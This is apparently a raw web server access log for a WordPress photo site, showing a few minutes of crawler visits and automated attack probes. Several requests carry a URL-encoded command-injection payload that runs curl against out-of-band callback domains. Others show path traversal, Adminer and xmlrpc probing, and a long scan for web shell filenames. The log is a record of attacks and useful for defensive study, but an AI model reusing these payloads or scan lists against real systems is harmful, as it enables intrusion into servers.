157.20.32.210 - - [18/Oct/2025:08:50:34 -0400] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchgei89uwn4db9gg.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchg48pn31ikhyf8n.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/16.3 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:08:50:32 -0400] "GET /products60892990?kg=0060150474 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:08:50:38 -0400] "GET /cong.PHP7 HTTP/1.1" 404 10899 "http://salhab360photos.com/cong.PHP7" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:50:47 -0400] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchg6ow1f1wpwei79.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchgb6sh93pxr1uwx.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; es-es) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
157.20.32.210 - - [18/Oct/2025:08:50:47 -0400] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchgei89uwn4db9gg.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchg48pn31ikhyf8n.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/16.3 Safari/605.1.15"
66.249.64.105 - - [18/Oct/2025:08:50:57 -0400] "GET /products113444700?kg=0112061311 HTTP/1.1" 200 29023 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:08:49:40 -0400] "GET /magmi/web/info.php HTTP/1.1" 404 12359 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20"
51.79.229.86 - - [18/Oct/2025:08:49:40 -0400] "GET /dan.php HTTP/1.1" 404 10897 "http://salhab360photos.com/dan.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:49:46 -0400] "GET /da.php HTTP/1.1" 404 10905 "http://salhab360photos.com/da.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:49:52 -0400] "GET /duck.php HTTP/1.1" 404 10901 "http://salhab360photos.com/duck.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:49:56 -0400] "GET /alone.php HTTP/1.1" 404 10903 "http://salhab360photos.com/alone.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:50:02 -0400] "GET /shift.php HTTP/1.1" 404 10896 "http://salhab360photos.com/shift.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:50:08 -0400] "GET /gege.php HTTP/1.1" 404 10897 "http://salhab360photos.com/gege.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:08:50:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760791816.3539700508117675781250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
81.200.10.200 - - [18/Oct/2025:08:50:23 -0400] "GET /tinyfilemanager.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:50:23 -0400] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchgei89uwn4db9gg.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchg48pn31ikhyf8n.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/16.3 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:08:50:34 -0400] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchg6ow1f1wpwei79.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchgb6sh93pxr1uwx.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; es-es) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
66.249.64.105 - - [18/Oct/2025:08:50:45 -0400] "GET /?products122873752?kg=0121375373 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:50:50 -0400] "GET /cong.PHP56 HTTP/1.1" 404 10906 "http://salhab360photos.com/cong.PHP56" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:50:58 -0400] "POST /storfs-asup HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:51:07 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:50:58 -0400] "GET /cong.PhP HTTP/1.1" 404 10905 "http://salhab360photos.com/cong.PhP" "Go-http-client/2.0"
66.249.64.107 - - [18/Oct/2025:08:51:10 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=238331 HTTP/1.1" 200 28755 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:51:07 -0400] "GET /cong.pHp HTTP/1.1" 404 10905 "http://salhab360photos.com/cong.pHp" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:08:51:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760791876.8516640663146972656250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:08:51:19 -0400] "GET /images/..%2finfo.html HTTP/1.1" 404 10902 "https://salhab360photos.com/info.html" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:51:21 -0400] "GET /L1.php HTTP/1.1" 404 10905 "http://salhab360photos.com/L1.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:51:33 -0400] "GET /R1.php HTTP/1.1" 404 10903 "http://salhab360photos.com/R1.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:51:42 -0400] "GET /%26.php HTTP/1.1" 404 10899 "http://salhab360photos.com/&.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:51:46 -0400] "GET /dermagabiru.php HTTP/1.1" 404 10897 "http://salhab360photos.com/dermagabiru.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:51:49 -0400] "GET /pes.php HTTP/1.1" 404 10897 "http://salhab360photos.com/pes.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:51:56 -0400] "GET /football.php HTTP/1.1" 404 10899 "http://salhab360photos.com/football.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:52:02 -0400] "GET /4ku.php HTTP/1.1" 404 10896 "http://salhab360photos.com/4ku.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:52:03 -0400] "GET /products160768826?kg=0158808312 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:52:07 -0400] "GET /ozi.php HTTP/1.1" 404 10904 "http://salhab360photos.com/ozi.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:52:19 -0400] "GET /0z1.php HTTP/1.1" 404 10899 "http://salhab360photos.com/0z1.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:52:32 -0400] "GET /products60902056?kg=0060159429 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:08:52:35 -0400] "POST /account/index.php HTTP/1.1" 404 10852 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:52:58 -0400] "GET /04.php HTTP/1.1" 404 10896 "http://salhab360photos.com/04.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:52:59 -0400] "POST /index.php HTTP/1.1" 200 11644 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:53:04 -0400] "GET /05.php HTTP/1.1" 404 10903 "http://salhab360photos.com/05.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:53:13 -0400] "GET /?author=1 HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:53:09 -0400] "GET /06.php HTTP/1.1" 404 10899 "http://salhab360photos.com/06.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:50:57 -0400] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchgei89uwn4db9gg.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchg48pn31ikhyf8n.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/16.3 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:08:51:06 -0400] "GET /products56731586?kg=0056039820 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:08:51:11 -0400] "GET /wp-admin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
51.79.229.86 - - [18/Oct/2025:08:51:13 -0400] "GET /k4mu.php HTTP/1.1" 404 10905 "http://salhab360photos.com/k4mu.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:08:51:24 -0400] "GET /products12349688?kg=0012199165 HTTP/1.1" 200 29181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:51:28 -0400] "GET /L2.php HTTP/1.1" 404 10897 "http://salhab360photos.com/L2.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:51:32 -0400] "GET /products60929002?kg=0060186048 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:08:51:32 -0400] "GET /products130161060?kg=0128573811 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:51:39 -0400] "GET /R2.php HTTP/1.1" 404 10905 "http://salhab360photos.com/R2.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:08:52:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760791937.0510089397430419921875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:08:52:12 -0400] "GET /0zi.php HTTP/1.1" 404 10903 "http://salhab360photos.com/0zi.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:52:26 -0400] "GET /ozil.php HTTP/1.1" 404 10905 "http://salhab360photos.com/ozil.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:52:31 -0400] "GET /0l.php HTTP/1.1" 404 10897 "http://salhab360photos.com/0l.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:52:38 -0400] "GET /02.php HTTP/1.1" 404 10898 "http://salhab360photos.com/02.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:52:46 -0400] "POST /opensis/index.php HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:52:47 -0400] "GET /03.php HTTP/1.1" 404 10899 "http://salhab360photos.com/03.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:53:08 -0400] "GET /products89585246?kg=0088492826 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:08:53:16 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.61.153.107 - - [18/Oct/2025:08:55:21 -0400] "POST /wp-cron.php?doing_wp_cron=1760792121.4515569210052490234375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
182.253.50.132 - - [18/Oct/2025:08:55:24 -0400] "POST /xmlrpc.php HTTP/1.1" 200 0 "-" "python-httpx/0.22.0"
51.79.229.86 - - [18/Oct/2025:08:55:23 -0400] "GET /bott.php HTTP/1.1" 404 10903 "http://salhab360photos.com/bott.php" "Go-http-client/2.0"
182.253.50.132 - - [18/Oct/2025:08:55:24 -0400] "POST /xmlrpc.php HTTP/1.1" 200 0 "-" "python-httpx/0.22.0"
66.249.64.106 - - [18/Oct/2025:08:55:39 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=151896 HTTP/1.1" 200 29254 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:08:55:33 -0400] "GET /images/..%2finfo.html HTTP/1.1" 200 0 "https://salhab360photos.com/info.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0"
20.171.207.254 - - [18/Oct/2025:08:55:40 -0400] "GET /products60886430?kg=0060143994 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:08:55:48 -0400] "GET /cocote.php HTTP/1.1" 404 10905 "http://salhab360photos.com/cocote.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:55:55 -0400] "GET /ngapak.php HTTP/1.1" 404 10906 "http://salhab360photos.com/ngapak.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:56:05 -0400] "GET /IY.php HTTP/1.1" 404 10903 "http://salhab360photos.com/IY.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:56:15 -0400] "GET /canda.php HTTP/1.1" 404 10896 "http://salhab360photos.com/canda.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:56:21 -0400] "GET /blocks.php HTTP/1.1" 404 10898 "http://salhab360photos.com/blocks.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:56:23 -0400] "GET /dek.php HTTP/1.1" 404 10903 "http://salhab360photos.com/dek.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:56:34 -0400] "GET /kses.php HTTP/1.1" 404 10904 "http://salhab360photos.com/kses.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:56:46 -0400] "POST /adminer/adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:56:46 -0400] "POST /_adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:56:46 -0400] "POST /_adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:56:53 -0400] "POST /wp-json/buddypress/v1/signup HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/125.0"
51.79.229.86 - - [18/Oct/2025:08:56:52 -0400] "GET /fek.php HTTP/1.1" 404 10924 "http://salhab360photos.com/fek.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:56:57 -0400] "POST /_adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:56:57 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:08:56:57 -0400] "POST /adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:08:56:57 -0400] "POST /_adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:08:55:44 -0400] "GET /categories/11365314 HTTP/1.1" 200 29144 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.106 - - [18/Oct/2025:08:55:48 -0400] "GET /?products122705082?kg=0121208760 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
51.79.229.86 - - [18/Oct/2025:08:55:36 -0400] "GET /bottt.php HTTP/1.1" 404 10898 "http://salhab360photos.com/bottt.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:55:44 -0400] "GET /images/..%2finfo.html HTTP/1.1" 404 10902 "https://salhab360photos.com/info.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0"
51.79.229.86 - - [18/Oct/2025:08:56:01 -0400] "GET /Cocote.php HTTP/1.1" 404 10903 "http://salhab360photos.com/Cocote.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:56:07 -0400] "GET /products153852422?kg=0151976254 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:08:56:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760792174.6581161022186279296875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:08:56:10 -0400] "GET /IYA.php HTTP/1.1" 404 10903 "http://salhab360photos.com/IYA.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:56:29 -0400] "GET /bek.php HTTP/1.1" 404 10895 "http://salhab360photos.com/bek.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:56:38 -0400] "GET /products89555694?kg=0088463634 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:56:40 -0400] "GET /cek.php HTTP/1.1" 404 10902 "http://salhab360photos.com/cek.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:56:42 -0400] "GET /products60942892?kg=0060199767 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
